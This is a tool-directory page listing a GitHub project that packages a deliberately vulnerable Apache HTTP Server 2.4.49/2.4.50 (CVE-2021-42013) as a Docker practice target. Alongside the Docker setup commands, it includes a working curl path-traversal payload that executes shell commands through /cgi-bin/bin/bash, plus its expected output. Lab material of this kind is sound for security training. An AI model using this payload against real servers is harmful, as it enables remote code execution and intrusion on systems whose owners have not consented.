Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-42013 — Vulnerable configuration Apache HTTP Server version 2.4.49/2.4.50 | Kitploit
Tools/GitHubGitHub/12345qwert123456/cve-2021-42013
Container SecurityVulnerability AnalysisExploitationWeb SecurityPenetration TestingArchived
GitHub12345qwert123456/cve-2021-42013

CVE-2021-42013

Vulnerable configuration Apache HTTP Server version 2.4.49/2.4.50

View Repository
73 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-42013 Vulnerable service

Installation

Several options:

1. Docker container

root@kitploit:~
docker run -d -p 8080:80 12345qwert123456/apache_2_4_50_cve-2021-42013

2. Dockerfile

root@kitploit:~
git clone https://github.com/12345qwert123456/CVE-2021-42013.git

cd CVE-2021-42013-Vulnerable-service/2.4.50

docker build -t apache_2_4_50_cve-2021-42013 .

docker run -d -p 8080:80 apache_2_4_50_cve-2021-42013

Explotation

Command:

root@kitploit:~
curl --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://127.0.0.1:8080/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash"

Expected output:

root@kitploit:~
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Download Tool